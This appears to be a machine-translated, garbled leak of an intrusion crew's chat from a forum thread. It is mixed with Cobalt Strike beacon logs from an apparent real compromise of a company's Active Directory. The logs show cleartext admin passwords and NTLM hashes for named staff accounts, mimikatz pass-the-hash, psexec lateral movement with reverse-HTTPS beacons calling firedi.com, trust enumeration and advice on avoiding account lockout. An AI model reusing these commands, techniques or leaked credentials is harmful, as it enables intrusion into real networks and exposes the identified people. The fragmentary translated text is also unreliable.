https://helpdocpt.club/threads/windows-%D0%A4%D0%BE%D1%80%D1%81-%D1%83%D0%B4%D0%B0%D0%BB%D1%91%D0%BD%D0%BD%D0%BE%D0%B3%D0%BE-%D0%BE%D0%B1%D0%BD%D0%BE%D0%B2%D0%BB%D0%B5%D0%BD%D0%B8%D1%8F-%D0%B3%D1%80%D1%83%D0%BF%D0%BF%D0%BE%D0%B2%D1%8B%D1%85-%D0%BF%D0%BE%D0%BB%D0%B8%D1%82%D0%B8%D0%BA.43/есть лингвисты? проверьте
https://helpdocpt.club/threads/%D0%9E%D1%82%D0%BA%D0%BB%D1%8E%D1%87%D0%B5%D0%BD%D0%B8%D0%B5-windows-defender-%D1%87%D0%B5%D1%80%D0%B5%D0%B7-%D0%B3%D1%80%D1%83%D0%BF%D0%BF%D0%BE%D0%B2%D1%8B%D0%B5-%D0%BF%D0%BE%D0%BB%D0%B8%D1%82%D0%B8%D0%BA%D0%B8.42/ну if they are finished it is unlikely there is anything else to do there also mother-in-law lpe exploits translate the guide to disable vin def for the forum nonstop check everything to have time to deal with the forum and additional modules neah (the old have not arrived? nah (no sessions?) helloHi all
if there are sessions - wait so are we done? better get a "local" admin if you're inside your trust domain i haven't changed passwords?
beacon> make_token saig.frd.global\adm.soucam1 chs@1944!
[*] Tasked beacon to create a token for saig.frd.global\adm.soucam1
[+] host called home, sent: 55 bytes
[+] Impersonated NT AUTHORITY\SYSTEM
beacon> shell tasklist /s 10.195.23.14 /v
[*] Tasked beacon to run: tasklist /s 10.195.23.14 /v
[+] host called home, sent: 58 bytes
[+] received output:
ERROR: Logon failure: unknown user name or bad password.


``1 out of 3 should hit)`` and you try the other 2
Password expires 11/10/2018 6:46:28 PM
``````

beacon> shell net use X: \\10.195.113.12\C$\temp /user:c360.local\adm.ravven0 Need2learn2008
[*] Tasked beacon to run: net use X: \\10.195.113.12\C$\temp /user:c360.local\adm.ravven0 Need2learn2008
[+] host called home, sent: 109 bytes
[+] received output:
System error 2242 has occurred.

The password of this user has expired.

``then look at the program files``
beacon> shell tasklist /s 10.195.13.14 /v /u c360.local\adm.ravven0 /p Need2learn2008
[*] Tasked beacon to run: tasklist /s 10.195.13.14 /v /u c360.local\adm.ravven0 /p Need2learn2008
[+] host called home, sent: 102 bytes
[+] received output:
ERROR: The RPC server is unavailable.


``Try directly specifying accesses without tokenvot 3 pcs``.
adm.ravven0:Need2learn2008
``````
adm.taydav1:G0d1sr3al!
``````
adm.turime0:Concentrada2
``````
1210 adm.kinzac1 52ab4557416b5fd8dfeed6e329db05fb 512
1199 adm.turime0 aa94145c9f2d8a1cea6b554049fe7c1d 512
1207 adm.matdmy0 43527144907fdc17ccf21dac8f24a39c 66048
1202 adm.kalnic0 d9c4c5a3dca64991399474767d6276b9f9 512
500 c360.datacentre 1cd6234cdaf74494d8689cd56317637c 66048
1205 adm.bisfra0 0e36ddd194d4b863966cf521fd6e683e 512
1216 adm.facjoe0 c58e6ce4e121d1c79ff799b42898121d 512
1118 adm.ravven0 ebc8defb32dea60e9ed2470e6810a76b 512
1218 adm.taydav1 03e9c6b99ff2bbdf6f8c39af19e1b7d0 512
I'll check 5 or 6[ ](https://mediaeveryone.com/group/saiglobal-com?msg=CtE7inA3av5aGBwhy) and give me the hashes of the critical infrastructural servers required for domain authentication
but if there is also some balloon there, you can leave the markdomen controllers always necessarily remain in a separate groupclearcred no then another yes, with clearedcreds
>operatingSystem: Windows Server 2012 R2 Standard
>operatingSystemVersion: 6.3 (9600)
```
```
beacon> portscan 10.195.13.14 445,139 icmp 1024
[*] Tasked beacon to scan ports 445,139 on 10.195.13.14
[+] host called home, sent: 93245 bytes
[+] received output:
(ICMP) Target '10.195.13.14' is alive. [read 8 bytes]
10.195.13.14:139
10.195.13.14:445 (platform: 500 version: 6.3 name: AUHDC1-CSPSQL10 domain: C360)
Scanner module is complete
Try it with a direct kred indication? which os, domain will it detect? and portscan 139 445 on this pc
beacon> shell net user adm.ji0lei0 /dom
[*] Tasked beacon to run: net user adm.ji0lei0 /dom
[+] host called home, sent: 56 bytes
[+] received output:
User name adm.ji0lei0
Full Name Admin - Leida Ji
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never

Password last set 30/08/2018 6:46:28 PM
Password expires 11/10/2018 6:46:28 PM
Password changeable 31/08/2018 6:46:28 PM
Password required Yes
User may change password Yes

Workstations allowed All
Logon script
User profile
Home directory
Last logon Never

Logon hours allowed All

Local Group Memberships
Global Group memberships *Domain Users *Domain Admins
The command completed successfully.

``net user give it token yes from which the account is active? and what is the error?
c "c360.local" dir also does not give out with the token YES (account is active, credentials are valid)

```
beacon> shell dir \10.195.13.14\c$
[*] Tasked beacon to run: dir \\10.195.13.14\c$
[+] host called home, sent: 52 bytes
[+] received output:
Access is denied.
``I tried it on 3 different machines
beacon> shell tasklist /s 10.225.10.215 /v
[*] Tasked beacon to run: tasklist /s 10.225.10.215 /v
[+] host called home, sent: 59 bytes
What? RDS? Is there a CmRcService in Terminal Server? Does it have >memberOf: CN=Terminal Server License Servers,CN=Builtin,DC=datacenter,DC=local@tl1 if the PC has OU=Corporate IT
it is possible to put it into such a subgroup when sorting? services from AD, processes are taken down when nothing is clear from AD info list of processes, its group, description in AD, etc.
viewing the groups of policies for the sake of understanding the structure of the network - just a great idea and what method means exactly? and what kind of information is needed so special? ah, well, yes, I did a separate thread ... at least these went into quarantine ...
dn:CN=c360.local,CN=System,DC=saig,DC=frd,DC=global
>whenCreated: 2018/06/08-09:25:57 AUS Eastern Daylight Time
>name: c360.local
>securityIdentifier: S-1-5-21-2457170381-1748207559-2678280483
>trustDirection: 3 [Inbound(1);Outbound(2)
>trustPartner: c360.local
>trustType: 2 [UpLevel(2)
>trustAttributes: 4 [Quarantined-Domain(4)]

dn:CN=datacenter.local,CN=System,DC=saig,DC=frd,DC=global
>whenCreated: 2018/06/09-00:59:39 AUS Eastern Daylight Time
>name: datacenter.local
>securityIdentifier: S-1-5-21-3425310730-2254951293-3528185534
>trustDirection: 3 [Inbound(1);Outbound(2)
>trustPartner: datacenter.local
>trustType: 2 [UpLevel(2)
>trustAttributes: 4 [Quarantined-Domain(4)]
``We've had a change in communications, it was in the forum.``

dn:CN=80-20.com,CN=System,DC=saig,DC=frd,DC=global
>whenCreated: 2008/04/03-15:34:59 AUS Eastern Daylight Time
>name: 80-20.com
>securityIdentifier: S-1-5-21-789336058-1343024091-1417001333
>trustDirection: 3 [Inbound(1);Outbound(2)
>trustPartner: 80-20.com
>trustType: 2 [UpLevel(2)
>trustAttributes: 4 [Quarantined-Domain(4)]

dn:CN=legalco.local,CN=System,DC=saig,DC=frd,DC=global
>whenCreated: 2010/06/02-15:05:33 AUS Eastern Daylight Time
>name: legalco.local
>securityIdentifier: S-1-5-21-1275210071-2025429265-1417001333
>trustDirection: 3 [Inbound(1);Outbound(2)
>trustPartner: legalco.local
>trustType: 2 [UpLevel(2)
>trustAttributes: 68 [Quarantined-Domain(4);Treat-External(64)]

dn:CN=frd.global,CN=System,DC=saig,DC=frd,DC=global
>whenCreated: 2006/03/20-15:18:22 AUS Eastern Daylight Time
>name: frd.global
>securityIdentifier: S-1-5-21-2724714270-1340506477-316473475
>trustDirection: 3 [Inbound(1);Outbound(2)
>trustPartner: frd.global
>trustType: 2 [UpLevel(2)
>trustAttributes: 32 [Within-Forest(32)]

dn:CN=Anstat.local,CN=System,DC=saig,DC=frd,DC=global
>whenCreated: 2007/07/03-13:18:37 AUS Eastern Daylight Time
>name: Anstat.local
>securityIdentifier: S-1-5-21-295181386-3567791559-1353306441
>trustDirection: 3 [Inbound(1);Outbound(2)
>trustPartner: Anstat.local
>trustType: 2 [UpLevel(2)
>trustAttributes: 4 [Quarantined-Domain(4)]

dn:CN=leaders.frd.global,CN=System,DC=saig,DC=frd,DC=global
>whenCreated: 2011/01/18-14:59:38 AUS Eastern Daylight Time
>name: leaders.frd.global
>securityIdentifier: S-1-5-21-888074932-249386324-1990136273
>trustDirection: 1 [Inbound(1)
>trustPartner: leaders.frd.global
>trustType: 2 [UpLevel(2)
>trustAttributes: 32 [Within-Forest(32)]

dn:CN=standards.com.au,CN=System,DC=saig,DC=frd,DC=global
>whenCreated: 2006/04/18-13:02:07 AUS Eastern Daylight Time
>name: standards.com.au
>securityIdentifier: S-1-5-21-8915387-1104766828-763373030
>trustDirection: 3 [Inbound(1);Outbound(2)
>trustPartner: standards.com.au
>trustType: 2 [UpLevel(2)
>trustAttributes: 0 []

dn:CN=saig.frd.global,CN=System,DC=frd,DC=global
>whenCreated: 2006/03/20-15:18:22 AUS Eastern Daylight Time
>name: saig.frd.global
>securityIdentifier: S-1-5-21-2959458370-3657645319-1944215935
>trustDirection: 3 [Inbound(1);Outbound(2)
>trustPartner: saig.frd.global
>trustType: 2 [UpLevel(2)
>trustAttributes: 32 [Within-Forest(32)]

dn:CN=ad-apse2.np.aws.saig,CN=System,DC=frd,DC=global
>whenCreated: 2017/05/19-14:26:44 AUS Eastern Daylight Time
>name: ad-apse2.np.aws.saig
>securityIdentifier: S-1-5-21-199586283-846828525-2273482586
>trustDirection: 3 [Inbound(1);Outbound(2)
>trustPartner: ad-apse2.np.aws.saig
>trustType: 2 [UpLevel(2)
>trustAttributes: 8 [Transitive(8)]

dn:CN=ad-usea1.np.aws.saig,CN=System,DC=frd,DC=global
>whenCreated: 2017/07/11-17:21:06 AUS Eastern Daylight Time
>name: ad-usea1.np.aws.saig
>securityIdentifier: S-1-5-21-3403532533-1899797052-316633242
>trustDirection: 3 [Inbound(1);Outbound(2)
>trustPartner: ad-usea1.np.aws.saig
>trustType: 2 [UpLevel(2)
>trustAttributes: 8 [Transitive(8)]

dn:CN=ad-apse2.build.aws.saig,CN=System,DC=frd,DC=global
>whenCreated: 2017/07/12-11:16:33 AUS Eastern Daylight Time
>name: ad-apse2.build.aws.saig
>securityIdentifier: S-1-5-21-2542211190-1088484194-4279143674
>trustDirection: 3 [Inbound(1);Outbound(2)
>trustPartner: ad-apse2.build.aws.saig
>trustType: 2 [UpLevel(2)
>trustAttributes: 8 [Transitive(8)]

dn:CN=ad-euce1.prd.aws.saig,CN=System,DC=frd,DC=global
>whenCreated: 2017/11/08-13:27:58 AUS Eastern Daylight Time
>name: ad-euce1.prd.aws.saig
>securityIdentifier: S-1-5-21-3050823117-3304142573-3876120398
>trustDirection: 3 [Inbound(1);Outbound(2)
>trustPartner: ad-euce1.prd.aws.saig
>trustType: 2 [UpLevel(2)
>trustAttributes: 8 [Transitive(8)]

dn:CN=ad-usea1.prd.aws.saig,CN=System,DC=frd,DC=global
>whenCreated: 2018/01/15-20:16:54 AUS Eastern Daylight Time
>name: ad-usea1.prd.aws.saig
>securityIdentifier: S-1-5-21-2974031555-4010838971-2461281460
>trustDirection: 3 [Inbound(1);Outbound(2)
>trustPartner: ad-usea1.prd.aws.saig
>trustType: 2 [UpLevel(2)
>trustAttributes: 8 [Transitive(8)]

dn:CN=datacenter.local,CN=System,DC=frd,DC=global
>whenCreated: 2018/04/14-00:59:37 AUS Eastern Daylight Time
>name: datacenter.local
>securityIdentifier: S-1-5-21-3425310730-2254951293-3528185534
>trustDirection: 3 [Inbound(1);Outbound(2)
>trustPartner: datacenter.local
>trustType: 2 [UpLevel(2)
>trustAttributes: 8 [Transitive(8)]

dn:CN=c360uk.local,CN=System,DC=frd,DC=global
>whenCreated: 2018/04/17-20:20:15 AUS Eastern Daylight Time
>name: c360uk.local
>securityIdentifier: S-1-5-21-2060452117-3986949954-748576278
>trustDirection: 3 [Inbound(1);Outbound(2)
>trustPartner: c360uk.local
>trustType: 2 [UpLevel(2)
>trustAttributes: 8 [Transitive(8)]

dn:CN=SaigProd.local,CN=System,DC=saig,DC=frd,DC=global
>whenCreated: 2018/06/07-15:56:50 AUS Eastern Daylight Time
>name: SaigProd.local
>securityIdentifier: S-1-5-21-3702894564-3969952199-2128771015
>trustDirection: 3 [Inbound(1);Outbound(2)
>trustPartner: SaigProd.local
>trustType: 2 [UpLevel(2)]
>trustAttributes: 4 [Quarantined-Domain(4)]

dn:CN=c360.local,CN=System,DC=saig,DC=frd,DC=global
>whenCreated: 2018/06/08-09:25:57 AUS Eastern Daylight Time
>name: c360.local
>securityIdentifier: S-1-5-21-2457170381-1748207559-2678280483
>trustDirection: 3 [Inbound(1);Outbound(2)
>trustPartner: c360.local
>trustType: 2 [UpLevel(2)
>trustAttributes: 4 [Quarantined-Domain(4)]

dn:CN=datacenter.local,CN=System,DC=saig,DC=frd,DC=global
>whenCreated: 2018/06/09-00:59:39 AUS Eastern Daylight Time
>name: datacenter.local
>securityIdentifier: S-1-5-21-3425310730-2254951293-3528185534
>trustDirection: 3 [Inbound(1);Outbound(2)
>trustPartner: datacenter.local
>trustType: 2 [UpLevel(2)
>trustAttributes: 4 [Quarantined-Domain(4)]

dn:CN=c360uk.local,CN=System,DC=saig,DC=frd,DC=global
>whenCreated: 2018/07/23-20:59:31 AUS Eastern Daylight Time
>name: c360uk.local
>securityIdentifier: S-1-5-21-2060452117-3986949954-748576278
>trustDirection: 3 [Inbound(1);Outbound(2)
>trustPartner: c360uk.local
>trustType: 2 [UpLevel(2)
>trustAttributes: 4 [Quarantined-Domain(4)]

dn:CN=ad-apse2.prd.aws.saig,CN=System,DC=frd,DC=global
>whenCreated: 2019/07/24-18:10:06 AUS Eastern Daylight Time
>name: ad-apse2.prd.aws.saig
>securityIdentifier: S-1-5-21-3745473896-2843996748-977219772
>trustDirection: 3 [Inbound(1);Outbound(2)
>trustPartner: ad-apse2.prd.aws.saig
>trustType: 2 [UpLevel(2)
>trustAttributes: 8 [Transitive(8)]


19 Objects returned

Well, now that you mention processcolour
here you go
https://github.com/icebearfriend/Quickrundownувы, it's wildly tedious pdf, but sometimes if you shine on it a bit - informative) if it processcolor.cna skidykaGood for you, it's more about trusts and attributes and stuffxD hope that something else can shoot hell...Lolno we did not throw it specially you can take in one command all the trusts in the domain now I will throw you a cool thing
which I should have given long ago ... but okay at least did samosamokriticheskoe xDda I'm a stupid animal what can I say here was with *[ ](https://mediaeveryone.com/group/saiglobal-com?msg=RhSbHC2uoMM5zoivr) 100% was a session under the admin and you tried to bypass the yuak yes?
user 2-2[AUHDC1-SPPDC01]SYSTEM */4576|2020Oct06 01:15:50> net domain_trusts
[*] Tasked beacon to run net domain_trusts
[+] host called home, sent: 104513 bytes
[+] received output:
List of domain trusts:

    0: SAIG saig.frd.global (Direct Outbound) (Direct Inbound)
    1: SAIGPROD saigProd.local (Forest tree root) (Primary Domain) (Native)
``````
>trustAttributes: 32 [Within-Forest(32)]
```
In a forest, respectively, it can be a trustA transitive trust is a trust that is extended not only to a child object, but also to each object that the child trusts. (In contrast, a non-transitive trust extends only to one object.) there's a session under local polzak or somethinga it's ok so are you an admin? I can't get a system on datacenter.local, it's win serv 2016
```
beacon> elevate svc-exe
[*] Tasked beacon to run windows/beacon_https/reverse_https (firedi.com:443) via Service Control Manager (\127.0.0.1\ADMIN$\b59b87e.exe)
[+] host called home, sent: 291370 bytes
[-] Could not start service b59b87e on .: 225
```
what to do?
beacon> shell ping -n 1 frd.global
[*] Tasked beacon to run: ping -n 1 frd.global
[+] host called home, sent: 51 bytes
[+] received output:

Pinging frd.global [10.225.12.1] with 32 bytes of data:
Reply from 10.225.12.1: bytes=32 time<1ms TTL=128

Ping statistics for 10.225.12.1:
    Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 0ms, Maximum = 0ms, Average = 0ms

``````
beacon> shell ping frd.global
[*] Tasked beacon to run: ping frd.global
[+] host called home, sent: 46 bytes
[+] received output:

Pinging frd.global [10.195.25.98] with 32 bytes of data:
Reply from 10.195.25.98: bytes=32 time=206ms TTL=123
Reply from 10.195.25.98: bytes=32 time=206ms TTL=123
Reply from 10.195.25.98: bytes=32 time=206ms TTL=123
Reply from 10.195.25.98: bytes=32 time=206ms TTL=123

Ping statistics for 10.195.25.98:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 206ms, Maximum = 206ms, Average = 206ms

``@tl2 tell me please the difference between transitive and forrest?`` This is from the current
dn:CN=frd.global,CN=System,DC=saig,DC=frd,DC=global
>whenCreated: 2006/03/20-00:18:22 Eastern Daylight Time
>name: frd.global
>securityIdentifier: S-1-5-21-2724714270-1340506477-316473475
>trustDirection: 3 [Inbound(1);Outbound(2)
>trustPartner: frd.global
>trustType: 2 [UpLevel(2)
>trustAttributes: 32 [Within-Forest(32)]
```о
transitive
+sees it?"``
dn:CN=frd.global,CN=System,DC=datacenter,DC=local
>whenCreated: 2018/04/14-00:59:25 AUS Eastern Daylight Time
>name: frd.global
>securityIdentifier: S-1-5-21-2724714270-1340506477-316473475
>trustDirection: 3 [Inbound(1);Outbound(2)
>trustPartner: frd.global
>trustType: 2 [UpLevel(2)
>trustAttributes: 8 [Transitive(8)]
````datacenter.local`
```
dn:CN=saig.frd.global,CN=System,DC=datacenter,DC=local
>whenCreated: 2018/06/09-00:59:39 AUS Eastern Daylight Time
>name: saig.frd.global
>securityIdentifier: S-1-5-21-2959458370-3657645319-1944215935
>trustDirection: 3 [Inbound(1);Outbound(2)
>trustPartner: saig.frd.global
>trustType: 2 [UpLevel(2)
>trustAttributes: 4 [Quarantined-Domain(4)]

dn:CN=frd.global,CN=System,DC=datacenter,DC=local
>whenCreated: 2018/04/14-00:59:25 AUS Eastern Daylight Time
>name: frd.global
>securityIdentifier: S-1-5-21-2724714270-1340506477-316473475
>trustDirection: 3 [Inbound(1);Outbound(2)
>trustPartner: frd.global
>trustType: 2 [UpLevel(2)
>trustAttributes: 8 [Transitive(8)]
``the rest of us? >`Yeah, there's only a reverse trustc360.local
```
Using server: AUHDC1-C360-DC1.c360.local:3268
Directory: Windows Server 2012 R2

dn:CN=saig.frd.global,CN=System,DC=c360,DC=local
>whenCreated: 2018/06/08-09:22:10 AUS Eastern Daylight Time
>name: saig.frd.global
>securityIdentifier: S-1-5-21-2959458370-3657645319-1944215935
>trustDirection: 3 [Inbound(1);Outbound(2)
>trustPartner: saig.frd.global
>trustType: 2 [UpLevel(2)
>trustAttributes: 4 [Quarantined-Domain(4)]


1 Objects returned
Are there any more trusts available in this domain among your trusts? Yes, except for one of them, did you take the trusts off in the "taken" domains?
dn:CN=SaigProd.local,CN=System,DC=saig,DC=frd,DC=global
>whenCreated: 2018/06/07-00:56:50 Eastern Daylight Time
>name: SaigProd.local
>securityIdentifier: S-1-5-21-3702894564-3969952199-2128771015
>trustDirection: 3 [Inbound(1);Outbound(2)
>trustPartner: SaigProd.local
>trustType: 2 [UpLevel(2)]
>trustAttributes: 4 [Quarantined-Domain(4)]
``and I asked you not to touch quarantines at least it's in quarantine''.
dn:CN=c360uk.local,CN=System,DC=saig,DC=frd,DC=global
>whenCreated: 2018/07/23-05:59:31 Eastern Daylight Time
>name: c360uk.local
>securityIdentifier: S-1-5-21-2060452117-3986949954-748576278
>trustDirection: 3 [Inbound(1);Outbound(2)
>trustPartner: c360uk.local
>trustType: 2 [UpLevel(2)
>trustAttributes: 4 [Quarantined-Domain(4)]
``top)= )waaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
beacon> shell dir \\10.225.10.201\c$
[*] Tasked beacon to run: dir \\10.225.10.201\c$
[+] host called home, sent: 53 bytes
[+] received output:
 Volume in drive \10.225.10.201\c$ has no label.
 Volume Serial Number is 2AC9-2F68

 Directory of \10.225.10.201$

14/03/2019 04:03 AM <DIR> PerfLogs
29/08/2020 03:26 AM <DIR> Program Files
14/03/2019 04:14 AM <DIR> Program Files (x86)
29/08/2020 03:26 AM <DIR> Temp
29/08/2020 02:52 AM <DIR> Users
06/10/2020 08:42 AM <DIR> Windows
               0 File(s) 0 bytes
               6 Dir(s) 49,648,717,824 bytes free

``You tested with ipac smb_login, try the IP address.
beacon> shell dir \\\datacenter.local\c$
[*] Tasked beacon to run: dir \\datacenter.local\c$
[+] host called home, sent: 56 bytes
[+] received output:
The system cannot find the file specified.

see the folders - you can copy the dll and run it with wmik or something then I see no problem to do a pth and check `dir \\\datacenter.local\c$````
[+] 10.225.10.201:445 - 10.225.10.201:445 - Success: 'datacenter.local\adm.brodan0:aad3b435b51404eeaad3b435b51404ee:06290576382001cd1da4c942e9fa0ca6' Administrator

[+] 10.225.10.201:445 - 10.225.10.201:445 - Success: 'datacenter.local\svc.sccmcliinst:aad3b435b51404eeaad3b435b51404ee:aa9249f57aba289658fde8afe795fd67' Administrator
Give me the results of the smb_login. How are the admins? Are they valid? Did I run them all in smb_login one at a time? Check the validity, just check the error number first. Did you check the smb_login? I guess that's not what's wrong?
beacon> jump psexec_psh datacenter.local https
[*] Tasked beacon to run windows/beacon_https/reverse_https (firedi.com:443) on datacenter.local via Service Control Manager (PSH)
[+] host called home, sent: 214281 bytes
[+] received output:
Started service a7c3be0 on datacenter.local
[-] Could not connect to pipe (\datacenter.local\pipe\status_d482): 2

beacon> jump psexec64 datacenter.local https
[*] Tasked beacon to run windows/beacon_https/reverse_https (firedi.com:443) on datacenter.local via Service Control Manager (\datacenter.local\ADMIN$\1f2a452.exe)
[+] host called home, sent: 291406 bytes
[-] Could not start service 1f2a452 on datacenter.local: 225
``with the first jump not done ``datacenter.local DA:``
```
svc.sccmcliinst
aa9249f57aba289658fde8afe795fd67

adm.brodan0
06290576382001cd1da4c942e9fa0ca6
``@user8 you can also go through smblogin to open the domain from the domain you opened in the report too
the credentials are valid``.
beacon> jump psexec_psh datacenter.local https
[*] Tasked beacon to run windows/beacon_https/reverse_https (firedi.com:443) on datacenter.local via Service Control Manager (PSH)
[+] host called home, sent: 214281 bytes
[+] received output:
Started service a7c3be0 on datacenter.local
[-] Could not connect to pipe (\datacenter.local\pipe\status_d482): 2
\DYA - admin's domainDYA - admin's domain, then do as he said? \pth "remote domain"\YA hash@user7 did you do what? with the domain or as LA? jump or smb_logs more than the ones you already checked then one more try, one, maximum 2 you tried less than 5 times in total on each one, right?
Lockout threshold: 10
what is the password policy in the current domain? and before that? these two have now tried one at a time on the jump, brute force does not run you can for the total number of fails and lock accounts how many brute force? i asked another question in smb_login? or rather i made a mistake and it for ALL domains the same and it is not necessary) so i as a search, there is 1 part of the hash from the wrong domain how much has tried?did not try 2[ ](https://mediaeveryone.com/group/saiglobal-com?msg=bP3Y7mjhGBpcKyw7P) so i asked[ ](https://mediaeveryone.com/group/saiglobal-com?msg=bP3Y7mjhGBpcKyw7P) so you had 10 admins there? ok a session in the slip, so if anything there drop a session on a distant server did you do through pth the same? and then there came hashes above? dunne 0/2dozhennye all jumped others?
beacon> pth datacenter.local\adm.barsmr0 fabb67c5be20e99698dbc77e751afb3f
[*] Tasked beacon to run mimikatz's sekurlsa::pth /user:adm.barsmr0 /domain:datacenter.local /ntlm:fabb67c5be20e99698dbc77e751afb3f /run:"%COMSPEC% /c echo d19dee36172 > \.\pipe\eb999d" command
[+] host called home, sent: 438886 bytes
[+] Impersonated NT AUTHORITY\SYSTEM
[+] received output:
user : adm.barsmr0
domain : datacenter.local
program : C:\Windows\system32\cmd.exe /c echo d19dee36172 > \.\pipe\eb999d
impers. : no
NTLM : fabb67c5be20e99698dbc77e751afb3f
  | PID 836
  | TID 1784
  | LSA Process is now R/W
  | LUID 0 ; 1753376140 (00000000:6882658c)
  \_ msv1_0 - data copy @ 000000EAA17DC2B0 : OK !
  \_ kerberos - data copy @ 000000EABD39BA68
   \_ aes256_hmac -> null
   \_ aes128_hmac -> null
   \_ rc4_hmac_nt OK
   \_ rc4_hmac_old OK
   \_ rc4_md4 OK
   \des_cbc_md5 -> null
   \_ des_cbc_crc -> null
   \_ rc4_hmac_nt_exp OK
   \_ rc4_hmac_old_exp OK
   \_ *Password replace @ 000000EAA17D1D98 (16) -> null

beacon> jump psexec_psh datacenter.local https
[*] Tasked beacon to run windows/beacon_https/reverse_https (firedi.com:443) on datacenter.local via Service Control Manager (PSH)
[+] host called home, sent: 214268 bytes
[-] Could not open service control manager on datacenter.local: 5
[-] Could not connect to pipe (\datacenter.local\pipe\status_d482): 1909
```

```
beacon> rev2self
[*] Tasked beacon to revert token
beacon> pth datacenter.local\adm.taydav1 24aa312899f051fbc1a5b464de82c802
[*] Tasked beacon to run mimikatz's sekurlsa::pth /user:adm.taydav1 /domain:datacenter.local /ntlm:24aa312899f051fbc1a5b464de82c802 /run:"%COMSPEC% /c echo 3a6015fae67 > \.\pipe\9f382d" command
[+] host called home, sent: 31 bytes
beacon> jump psexec_psh USHDC1-CSPADS02 https
[*] Tasked beacon to run windows/beacon_https/reverse_https (firedi.com:443) on USHDC1-CSPADS02 via Service Control Manager (PSH)
[+] host called home, sent: 653145 bytes
[+] Impersonated NT AUTHORITY\SYSTEM
[-] Could not open service control manager on USHDC1-CSPADS02: 1722
[-] Could not connect to pipe (\USHDC1-CSPADS02\pipe\status_d482): 53
[+] received output:
user : adm.taydav1
domain : datacenter.local
program : C:\Windows\system32\cmd.exe /c echo 3a6015fae67 > \.\pipe\9f382d
impers. : no
NTLM : 24aa312899f051fbc1a5b464de82c802
  | PID 6972
  | TID 6260
  | LSA Process is now R/W
  | LUID 0 ; 1752989744 (00000000:687c8030)
  \_ msv1_0 - data copy @ 000000EAA17DD480 : OK !
  \kerberos - data copy @ 000000EABD39BD78
   \_ aes256_hmac -> null
   \_ aes128_hmac -> null
   \_ rc4_hmac_nt OK
   \_ rc4_hmac_old OK
   \_ rc4_md4 OK
   \des_cbc_md5 -> null
   \_ des_cbc_crc -> null
   \_ rc4_hmac_nt_exp OK
   \_ rc4_hmac_old_exp OK
   \_ *Password replace @ 000000EAA18BC2F8 (16) -> null
``From the 3rd trust there are no common adminsWhy, with my number of LA hash only on ``
Administrator:500:aad3b435b51404eeaad3b435b51404ee:58a478135a93ac3bf058a5ea0e8fdb71:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

``search for >infoad_users? also the field in the dump ADinfo it? there LA sometimes leave creeds in the description can also look in ad_computers in info also empty? but it doesn't have to be)))) and descriptors from the same place I looked not from the datacenter, but from the primary domain :thumbsup: :thumbsup: :thumbsup: :thumbsup: :thumbsup: :thumbsup:that's what above,kzzzzzznm```

beacon> shell adfind.exe -b dc=c360,dc=local -f "(objectcategory=person)" > C:\Windows\temp\Eula_c360.txt
[*] Tasked beacon to run: adfind.exe -b dc=c360,dc=local -f "(objectcategory=person)" > C:\Windows\temp\Eula_c360.txt
[+] host called home, sent: 122 bytes
[+] received output:

AdFind V01.49.00.00cpp Joe Richards (joe@joeware.net) February 2015

ldap_get_next_page_s: [AUSYDHC-ESP-DC1.legalco.local] Error 0xa (10) - Referral

``````
 >description: Owner: Ludwina Kleiss (REQ0109502)
>sAMAccountName: conveyancing
>memberOf: CN=DL-Azure-EVCloudSync,OU=Static,OU=Global,OU=Distribution Groups,OU=Control,OU=0.SAI Global,DC=saig,DC=frd,DC=global
>memberOf: CN=SG-Global-Azure-Saiglb Users,OU=~ Global Security Groups,DC=saig,DC=frd,DC=global
```
```
>description: AMS Contractor (obsolete?)
>cn: Robert Hair
"samaccountname" and "memberof" no
dn:CN=Robert Hair,OU=Contacts,OU=APAC,OU=0.SAI Global,DC=saig,DC=frd,DC=global
```
```
>description: REQ0326018 Expiration date:�21/07/2020 (US00021RAP)
>sAMAccountName: shayog0
"memberof" no
dn:CN=Yogesh Sharma,OU=Contractor,OU=Alpharetta,OU=Users,OU=Americas,OU=0.SAI Global,DC=saig,DC=frd,DC=global
```
```
>description: REQ0341109 Expiration date:14/10/2020 (US00040RAP)
>sAMAccountName: mokmil0
>memberOf: CN=SG-GLOBAL-Horizon-QA Salesforce,OU=VMware Horizon,OU=Security Groups,OU=Groups,OU=0.SAI Global,DC=saig,DC=frd,DC=global
>memberOf: CN=SG-AMER-Horizon-POOL1,OU=VMware Horizon,OU=Security Groups,OU=Groups,OU=0.SAI Global,DC=saig,DC=frd,DC=global
>memberOf: CN=SG-APAC-Horizon-POOL4,OU=VMware Horizon,OU=Security Groups,OU=Groups,OU=0.SAI Global,DC=saig,DC=frd,DC=global
>memberOf: CN=SG-EMEA-Horizon-POOL1,OU=VMware Horizon,OU=Security Groups,OU=Groups,OU=0.SAI Global,DC=saig,DC=frd,DC=global
>memberOf: CN=SG-Okta-Intune,OU=Okta,OU=Security Groups,OU=Groups,OU=0.SAI Global,DC=saig,DC=frd,DC=global
>memberOf: CN=SG-Okta-Pulse Secure VPN,OU=Okta,OU=Security Groups,OU=Groups,OU=0.SAI Global,DC=saig,DC=frd,DC=global
>memberOf: CN=SG-Global-Dropbox Users,OU=Security Groups,OU=Groups,OU=0.SAI Global,DC=saig,DC=frd,DC=global
>memberOf: CN=DL-Azure-EVCloudSync,OU=Static,OU=Global,OU=Distribution Groups,OU=Control,OU=0.SAI Global,DC=saig,DC=frd,DC=global
>memberOf: CN=SG-Okta-Jira_Cloud-Users,OU=Okta,OU=Security Groups,OU=Groups,OU=0.SAI Global,DC=saig,DC=frd,DC=global
>memberOf: CN=SG-Okta-Confluence_Users,OU=Okta,OU=Security Groups,OU=Groups,OU=0.SAI Global,DC=saig,DC=frd,DC=global
>memberOf: CN=SG-Okta-MFA Okta Verify,OU=Okta,OU=Security Groups,OU=Groups,OU=0.SAI Global,DC=saig,DC=frd,DC=global
>memberOf: CN=SAIG - OneDrive User Policy,OU=APAC,OU=VDI,OU=0.SAI Global,DC=saig,DC=frd,DC=global
>memberOf: CN=SG-Global-Azure-M365 License-Standard,OU=~ Global Security Groups,DC=saig,DC=frd,DC=global
